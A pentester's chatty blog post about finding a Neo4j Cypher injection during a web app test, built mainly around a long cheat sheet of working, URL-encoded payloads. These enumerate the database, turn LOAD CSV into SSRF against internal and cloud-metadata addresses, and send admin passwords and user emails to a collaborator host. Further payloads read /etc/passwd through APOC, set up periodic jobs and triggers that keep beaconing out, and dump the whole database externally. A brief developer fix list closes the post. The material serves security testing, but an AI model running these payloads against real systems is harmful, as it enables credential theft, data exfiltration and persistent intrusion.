That Time I Found a Neo4j Cypher Injection (and How to Exploit It)

Neo4j meme Hey y'all 🤠 it's been a while...

2025 really went by and I've been processing SO much stuff happening in my personal life, work, everything. It's safe and grateful to say (yes I've been doing affirmations, don't judge) that I'm still alive, still living, and still doing cyber.

So um, this blog post has been delayed for almost a year. I was going to write it when my brain was still fresh with all the technical details but procrastination got a hold of me. Also doomscrolling on reels.

I heard from TikTok that my 5-9 after 9-5 shouldn't be about work, but sometimes you find cool stuff at work that you just have to post about and this is where I am at. Plus I think writing blog posts is marginally better than scrolling mindlessly through another influencer's scandal. (I am culturally connected to the internet and my internet haha hehes after 9-5 aren't usually about cyber at all; it's just random cultural moments full of influencer cancellations, brainrot memes, etc etc.)

anyways.

So I found this vulnerability when I was at work during a web app test. The app had this complex workflow system; I'm not sure how else to describe it but tl:dr: it had pretty graphs.

Turns out, pretty graphs need special databases. Who knew? Not me! I legitimately didn't know graph databases were a thing until now. I thought we peaked at SQL and NoSQL and called it a day. But no, apparently there's a whole other category for when your data looks like a spider web drawn by someone on their third espresso.

So while running Burp like any other Tuesday (or was it Thursday? Time is a construct when you're staring at HTTP requests all day), on a random API endpoint, I get this error that's definitely not SQL, but looks almost like it.

{code: Neo.ClientError.Statement.SyntaxError} {message: Invalid input '}': expected ")", "WHERE", "{" or a parameter...

Little did I know I was about to le arn so much about graph databases and their quirks.

Neo4j meme

Wait, What Even Is Neo4j?

This is a crash course (or curse) nobody asked for. Ifyky, you can skip this bit.

Neo4j is a graph database, which sounds fancy but it's basically a database that thinks everything is connected to everything else. Instead of boring tables with rows and columns (looking at you SQL), it stores data as nodes (things) and relationships (how things connect). It's like if your database watched too many conspiracy theory videos and started connecting everything with red string.

conspiracy dude

If you've ever used BloodHound for Active Directory pentesting, congratulations! You've already been using Neo4j without knowing it. BloodHound runs on Neo4j because when you're trying to figure out how Bob from Accounting can somehow become Domain Admin in three clicks, you NEED those relationship mappings.

There's apparently this whole cult following for Neo4j that I wasn't invited to. Like, there are people who REALLY love graph databases. They have conferences. They have merch. They probably have inside jokes about nodes and edges that would go over my head.

The query language is called Cypher. Instead of SELECT * FROM users, you write stuff like MATCH (n:User) RETURN n which honestly reads like you're casting a spell. The whole syntax is built around drawing patterns, which is either genius or cursed depending on how your brain works.

Let me show some examples:

SQL vs Cypher

Finding all users (basic but essential):

// SQL
SELECT * FROM users;

// Cypher
MATCH (n:User) RETURN n;

Finding users named "Alice":

// SQL
SELECT * FROM users WHERE name = 'Alice';

// Cypher
MATCH (n:User {name: 'Alice'}) RETURN n;

Okay so stay with me, finding who your friends are:

// SQL (pain)
SELECT u2.* FROM users u1
JOIN friendships f ON u1.id = f.user_id
JOIN users u2 ON f.friend_id = u2.id
WHERE u1.name = 'Alice';

// Cypher (chef's kiss)
MATCH (alice:User {name: 'Alice'})-[:FRIENDS_WITH]->(friend)
RETURN friend;

Finding friends of friends (this is where SQL developers cry):

// SQL (I'm not even going to write this monstrosity)
// It involves multiple self-joins and your DBA will hate you

// Cypher (literally just add more arrows)
MATCH (alice:User {name: 'Alice'})-[:FRIENDS_WITH]->()-[:FRIENDS_WITH]->(fof)
RETURN DISTINCT fof;

The relationship syntax is where Cypher really pop off. Look at these patterns:

--> means "goes to" (directed relationship)

-- means "connected to" (undirected)

-[:LIKES]-> means "connected by a LIKES relationship"

-[r:LIKES]-> means "give me that relationship and call it 'r'"

How to Exploit Cypher Injection

My first attempt was trying to find Cypher's equivalent of a print function. You know how in Python you can just print("hello") and see if your code runs? I was looking for something that would echo back to me.

GET /api/workflow/items?nodeType=Task)%20RETURN%20'hello'%20//&ref=7a8b9c0d-1e2f-3g4h-5i6j-7k8l9m0n1o2p(this is a random uuid)

And the app said:

HTTP/1.1 400 Bad Request
{
  "error": {
    "code": "Neo.ClientError.Statement.SyntaxError",
    "message": "Variable `Task` not defined (line 1, column 8)"
  }
}

Wait what? Oh... OH. It's not reading the label Task as a string label, it thinks it's a variable. Let me try wrapping it differently.

I kept getting a lot of error messages because I was literally learning the syntax through violence (violence against the API to be clear).

I learned that:

Cypher uses MATCH patterns like (n:Label).
You can't just throw parentheses wherever (unlike SQL where you can kinda wing it).
RETURN is mandatory - you can't just MATCH and call it a day.
The error messages actually tell you EXACTLY where your syntax broke.

Let me give you some error messages that look like cypher injection is confirmed when doing a pentest (If you come across one):

// This beautiful error when you mess up parentheses:
{
  "code": "Neo.ClientError.Statement.SyntaxError",
  "message": "Invalid input ')': expected WHERE, WITH, MATCH, RETURN (line 1, column 45)"
}

// My favorite, when Neo4j tells you exactly what it parsed:
{
  "code": "Neo.ClientError.Statement.SyntaxError",
  "message": "Query cannot conclude with MATCH (line 1, column 1)\n\"MATCH (n:ApprovalRequest)) MATCH (x:User"
}

Okay so now, here are some syntaxes you can try with vanilla Cypher injection. I added the encoded version if you need. (Remember, mine above was in the URL parameter so everything needed to be URL encoded, which is why my notes look like someone smashed their keyboard)

Basic Injection Testing

Simple return test:

RETURN 1337 //
// If URL encoded: RETURN%201337%20//

System Information Queries

(My faves, these are probably the most important for understanding what you're dealing with)

Get Neo4j version:

CALL dbms.components() YIELD name, versions UNWIND versions AS version RETURN name, version //
// If URL encoded: CALL%20dbms.components()%20YIELD%20name,%20versions%20UNWIND%20versions%20AS%20version%20RETURN%20name,%20version%20//

List all procedures (goldmine for finding what's available):

CALL dbms.procedures() YIELD name RETURN name //
// If URL encoded: CALL%20dbms.procedures()%20YIELD%20name%20RETURN%20name%20//

List all functions:

CALL dbms.functions() YIELD name RETURN name //
// If URL encoded: CALL%20dbms.functions()%20YIELD%20name%20RETURN%20name%20//

Get current user info:

CALL dbms.showCurrentUser() YIELD username, roles RETURN username, roles //
// If URL encoded: CALL%20dbms.showCurrentUser()%20YIELD%20username,%20roles%20RETURN%20username,%20roles%20//

List all users (if you have admin priv):

CALL dbms.security.listUsers() YIELD username, roles RETURN username, roles //
// If URL encoded: CALL%20dbms.security.listUsers()%20YIELD%20username,%20roles%20RETURN%20username,%20roles%20//

Check query execution plan (reveals internal structure):

EXPLAIN MATCH (n) RETURN n //
// If URL encoded: EXPLAIN%20MATCH%20(n)%20RETURN%20n%20//

Get database info:

CALL dbms.database.info() YIELD name, currentStatus RETURN name, currentStatus //
// If URL encoded: CALL%20dbms.database.info()%20YIELD%20name,%20currentStatus%20RETURN%20name,%20currentStatus%20//

List all databases:

SHOW DATABASES //
// If URL encoded: SHOW%20DATABASES%20//

Get configuration values:

CALL dbms.listConfig() YIELD name, value WHERE name CONTAINS 'auth' RETURN name, value //
// If URL encoded: CALL%20dbms.listConfig()%20YIELD%20name,%20value%20WHERE%20name%20CONTAINS%20'auth'%20RETURN%20name,%20value%20//

Memory and JVM info:

CALL dbms.queryJmx('java.lang:type=Memory') YIELD name, attributes RETURN name, attributes //
// If URL encoded: CALL%20dbms.queryJmx('java.lang:type%3DMemory')%20YIELD%20name,%20attributes%20RETURN%20name,%20attributes%20//

Transaction info:

CALL dbms.listTransactions() YIELD transactionId, username, startTime RETURN * //
// If URL encoded: CALL%20dbms.listTransactions()%20YIELD%20transactionId,%20username,%20startTime%20RETURN%20*%20//

Other Extraction Techniques

Collecting data:

MATCH (n:User) RETURN collect(n.name) //
// If URL encoded: MATCH%20(n:User)%20RETURN%20collect(n.name)%20//

Note: You don't actually need the URL encoded versions if you're testing through Burp or similar tools. They'll handle the encoding for you. But if you're crafting requests manually or debugging why your payload isn't working, knowing what the encoded version looks like is super helpful.

LOAD CSV

Neo4j has this feature called LOAD CSV that's meant for importing data from CSV files. Sounds innocent enough, right? Like "oh hey, let me import this spreadsheet into my graph database yay."

But here's the thing, it doesn't just load local files. It can fetch from URLs. External URLs. Your URLs.

It's like finding out your calculator can make phone calls. Like, technically it makes sense when you think about it, but also... why??

How LOAD CSV Works (And Why It's Perfect for SSRF)

So here's the deal with LOAD CSV. It's designed to fetch CSV data from a URL and parse it into rows you can work with. But Neo4j doesn't really care if your "CSV" is actually a CSV. It just makes an HTTP GET request to whatever URL you give it.

The basic syntax looks like:

LOAD CSV FROM 'https://example.com/data.csv' AS row RETURN row

But when you're injecting, you're probably doing something more like:

LOAD CSV FROM 'https://your-collaborator.com/test' AS line RETURN 1 //
// If URL encoded: LOAD%20CSV%20FROM%20'https://your-collaborator.com/test'%20AS%20line%20RETURN%201%20//

SSRF Payloads That Actually Work

Basic SSRF Test

Just checking if it reaches out:

LOAD CSV FROM 'https://[random-string].oastify.com/basic' AS line RETURN count(*) //
// If URL encoded: LOAD%20CSV%20FROM%20'https://[random-string].oastify.com/basic'%20AS%20line%20RETURN%20count(*)%20//

SSRF with Context

Adding some context to know which injection point worked:

LOAD CSV FROM 'https://[random-string].oastify.com/injection-worked' AS x RETURN 1 //
// If URL encoded: LOAD%20CSV%20FROM%20'https://[random-string].oastify.com/injection-worked'%20AS%20x%20RETURN%201%20//

Data Exfiltration via URL

This is where it gets wild. You can exfiltrate data in the URL itself:

Simple version:

MATCH (n:User {role:'admin'}) WITH n.password AS pwd LOAD CSV FROM 'https://[random-string].oastify.com/exfil?password=' + pwd AS line RETURN 1 //
// If URL encoded: MATCH%20(n:User%20{role:'admin'})%20WITH%20n.password%20AS%20pwd%20LOAD%20CSV%20FROM%20'https://[random-string].oastify.com/exfil?password='%20%2B%20pwd%20AS%20line%20RETURN%201%20//

Multiple values:

MATCH (n:User) WITH collect(n.email) AS emails LOAD CSV FROM 'https://[random-string].oastify.com/exfil?data=' + toString(emails) AS line RETURN 1 //
// If URL encoded: MATCH%20(n:User)%20WITH%20collect(n.email)%20AS%20emails%20LOAD%20CSV%20FROM%20'https://[random-string].oastify.com/exfil?data='%20%2B%20toString(emails)%20AS%20line%20RETURN%201%20//

Internal Network Scanning

You can use SSRF to scan internal networks:

Check internal services:

LOAD CSV FROM 'http://localhost:8080/admin' AS line RETURN line //
// If URL encoded: LOAD%20CSV%20FROM%20'http://localhost:8080/admin'%20AS%20line%20RETURN%20line%20//

Scan internal IPs:

LOAD CSV FROM 'http://192.168.1.1/' AS line RETURN line LIMIT 1 //
// If URL encoded: LOAD%20CSV%20FROM%20'http://192.168.1.1/'%20AS%20line%20RETURN%20line%20LIMIT%201%20//

Cloud metadata endpoints (the classic):

LOAD CSV FROM 'http://169.254.169.254/latest/meta-data/' AS line RETURN line //
// If URL encoded: LOAD%20CSV%20FROM%20'http://169.254.169.254/latest/meta-data/'%20AS%20line%20RETURN%20line%20//

Working with Headers

So when I say "if the CSV has headers," I'm talking about how CSV files often have a first row that describes what each column contains. Like imagine a CSV that returns: username,email,role alice,alice@example.com,admin

With headers, you can access values by name instead of index:

LOAD CSV WITH HEADERS FROM 'https://[random-string].oastify.com/data.csv' AS row RETURN row //
// If URL encoded: LOAD%20CSV%20WITH%20HEADERS%20FROM%20'https://[random-string].oastify.com/data.csv'%20AS%20row%20RETURN%20row%20//

Handling Errors and Timeouts

Testing timeout behavior (port 81 is usually closed so this helps you see timeout errors):

LOAD CSV FROM 'https://[random-string].oastify.com:81/timeout-test' AS line RETURN 1 //
// If URL encoded: LOAD%20CSV%20FROM%20'https://[random-string].oastify.com:81/timeout-test'%20AS%20line%20RETURN%201%20//

The Privilege Problem (Why Your SSRF Might Not Work)

Not all database users can use LOAD CSV freely. Neo4j has this thing where certain operations require specific privileges. The main privilege you need is usually part of the reader role or higher, but here's the catch:

Community Edition: Usually more permissive
Enterprise Edition: Might have stricter role-based access control

You might see errors like:

{
  "code": "Neo.ClientError.Security.Forbidden",
  "message": "LOAD CSV is not allowed for user 'readonly' with roles [PUBLIC]"
}

If you hit this, don't give up. Try to enumerate what privileges you DO have:

Check your current user privileges:

CALL dbms.showCurrentUser() //
// If URL encoded: CALL%20dbms.showCurrentUser()%20//

Sometimes admins configure custom roles that might have unexpected permissions. There's cases where:

Read-only users could still use LOAD CSV (whoops)
Authenticated users had more perms than intended
The app connected with way too many privileges

APOC: Neo4j's DLC (and how to abuse them)

Okay so remember when I mentioned APOC earlier? Yay! This is the fun bit. Really, I promise it is.

APOC stands for "Awesome Procedures on Cypher" which already tells you everything you need to know about the vibe. It's like someone looked at Neo4j and said "you know what this needs? MORE FEATURES." And then they actually did it.

First Things First: Is APOC Even There?

Before you get all excited, you gotta check if APOC is actually available. Here's how I usually test:

Quick check:

CALL apoc.version() //
// If URL encoded: CALL%20apoc.version()%20//

List all APOC procedures (this is a goldmine):

CALL dbms.procedures() YIELD name WHERE name STARTS WITH 'apoc' RETURN name //
// If URL encoded: CALL%20dbms.procedures()%20YIELD%20name%20WHERE%20name%20STARTS%20WITH%20'apoc'%20RETURN%20name%20//

Get help on specific APOC categories:

CALL apoc.help('load') YIELD name, text RETURN name, text //
// If URL encoded: CALL%20apoc.help('load')%20YIELD%20name,%20text%20RETURN%20name,%20text%20//

APOC has like 450+ procedures and functions. I'm not even joking. It's like Neo4j's expansion pack. Here are the ones that made my heart sing:

File System Access

Reading files:

CALL apoc.load.json('file:///etc/passwd') YIELD value RETURN value //
// If URL encoded: CALL%20apoc.load.json('file:///etc/passwd')%20YIELD%20value%20RETURN%20value%20//

Listing directories:

CALL apoc.load.directory('file:///var/log') YIELD value RETURN value //
// If URL encoded: CALL%20apoc.load.directory('file:///var/log')%20YIELD%20value%20RETURN%20value%20//

Network Requests (LOAD CSV's Cooler Cousin)

Making HTTP requests with more control:

CALL apoc.load.jsonParams('https://[random-string].oastify.com/apoc-test', {}, null) YIELD value RETURN value //
// If URL encoded: CALL%20apoc.load.jsonParams('https://[random-string].oastify.com/apoc-test',%20{},%20null)%20YIELD%20value%20RETURN%20value%20//

With custom headers:

CALL apoc.load.jsonParams('https://internal-api.local/data', {Authorization: 'Bearer stolen-token'}, null) YIELD value RETURN value //
// If URL encoded: CALL%20apoc.load.jsonParams('https://internal-api.local/data',%20{Authorization:%20'Bearer%20stolen-token'},%20null)%20YIELD%20value%20RETURN%20value%20//

Database Shenanigans

Running periodic background jobs (persistence anyone?):

CALL apoc.periodic.repeat('hack', 'LOAD CSV FROM "https://[random-string].oastify.com/ping" AS line RETURN 1', 60) //
// If URL encoded: CALL%20apoc.periodic.repeat('hack',%20'LOAD%20CSV%20FROM%20%22https://[random-string].oastify.com/ping%22%20AS%20line%20RETURN%201',%2060)%20//

Export entire database:

CALL apoc.export.json.all('https://[random-string].oastify.com/db-dump.json') //
// If URL encoded: CALL%20apoc.export.json.all('https://[random-string].oastify.com/db-dump.json')%20//

The Plugin Situation (It Gets Better/Worse)

APOC is modular. There's core APOC, and then there's APOC Extended, and then there are plugins for APOC. It's like DLC for your DLC.

Sometimes admins install extra stuff without realising what they're enabling:

Checking for Elasticsearch integration:

CALL apoc.es.info('http://localhost:9200') YIELD value RETURN value //
// If URL encoded: CALL%20apoc.es.info('http://localhost:9200')%20YIELD%20value%20RETURN%20value%20//

MongoDB access (because why not):

CALL apoc.mongodb.find('mongodb://localhost:27017', 'database.collection', {}) YIELD value RETURN value //
// If URL encoded: CALL%20apoc.mongodb.find('mongodb://localhost:27017',%20'database.collection',%20{})%20YIELD%20value%20RETURN%20value%20//

JDBC connections (this one's nice):

CALL apoc.load.jdbc('jdbc:mysql://internal-db:3306/prod', 'SELECT * FROM users') YIELD row RETURN row //
// If URL encoded: CALL%20apoc.load.jdbc('jdbc:mysql://internal-db:3306/prod',%20'SELECT%20*%20FROM%20users')%20YIELD%20row%20RETURN%20row%20//

My Favorite APOC Discoveries

The "Why Does This Even Exist" Award Goes To:

System information disclosure:

CALL apoc.metrics.get() YIELD value RETURN value //
// If URL encoded: CALL%20apoc.metrics.get()%20YIELD%20value%20RETURN%20value%20//

This dumps JVM metrics, heap usage, thread counts... thanks for the free recon?

The "This Should Be Illegal" Award:

Executing stored procedures from strings:

CALL apoc.cypher.run('MATCH (n) RETURN n', {}) YIELD value RETURN value //
// If URL encoded: CALL%20apoc.cypher.run('MATCH%20(n)%20RETURN%20n',%20{})%20YIELD%20value%20RETURN%20value%20//

You can build dynamic queries.

The "Persistence Is Key" Award:

Creating triggers (yes, triggers in a graph database):

CALL apoc.trigger.add('myTrigger', 'MATCH (n:User) WHERE n.email CONTAINS "@admin" LOAD CSV FROM "https://[random-string].oastify.com/admin-created" AS x RETURN 1', {phase: 'after'}) //
// If URL encoded: CALL%20apoc.trigger.add('myTrigger',%20'MATCH%20(n:User)%20WHERE%20n.email%20CONTAINS%20%22@admin%22%20LOAD%20CSV%20FROM%20%22https://[random-string].oastify.com/admin-created%22%20AS%20x%20RETURN%201',%20{phase:%20'after'})%20//

Things That Didn't Work (But I Tried Anyway)

Not everything in APOC is enabled by default. Some procedures need specific config settings:

Shell commands (sadly usually disabled):

CALL apoc.shell.run('whoami') YIELD value RETURN value //
// This usually fails with "procedure not found" or "disabled"

Writing files (also usually disabled):

CALL apoc.export.csv.query('MATCH (n) RETURN n', 'file:///tmp/dump.csv', {}) //
// Security says no

Sometimes you might not get those beautiful error messages back. The app just returns a generic 500 or worse, the same response regardless. This is where time-based and boolean-based techniques come in handy.

Boolean-based (when the app changes behavior based on true/false):

' OR 1=1 WITH 1 as a RETURN a //  -- True condition
' OR 1=2 WITH 1 as a RETURN a //  -- False condition

Time-based (making the database EEPY):

CALL apoc.util.sleep(5000) RETURN 1 //  -- 5 second delay
// If URL encoded: CALL%20apoc.util.sleep(5000)%20RETURN%201%20//

Without APOC, you can use expensive operations:

MATCH (a), (b), (c), (d), (e) RETURN count(*) //  -- Cartesian product goes brrrr

How to Fix If You're a Developer

My job is literally to break stuff. But here's how you can make my job harder (please don't do this):

Parameterized Queries

// BAD - I will find this and I will exploit it
query = `MATCH (n:User {name: '${userInput}'}) RETURN n`

// GOOD - This makes me sad (but secure)
query = `MATCH (n:User {name: $username}) RETURN n`
session.run(query, { username: userInput })

Quick Checklist:

Use parameterized queries ALWAYS (yes, even for that "internal only" endpoint)
Disable LOAD CSV from external URLs if you don't need it
If using APOC, whitelist (allowlist? people say allowlist) only the procedures you actually need
Use proper role-based access (your app doesn't need to be a Neo4j admin)
Input validation is nice but it's not a replacement for parameterization